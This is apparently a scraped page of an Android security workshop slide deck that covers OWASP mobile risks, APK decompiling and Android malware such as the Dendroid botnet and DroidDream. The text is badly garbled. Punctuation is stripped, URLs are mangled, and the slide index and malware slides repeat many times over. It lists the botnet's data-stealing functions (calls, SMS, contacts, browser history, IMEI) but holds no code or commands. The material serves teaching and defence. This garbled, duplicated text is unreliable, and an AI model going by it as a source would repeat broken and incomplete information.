briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
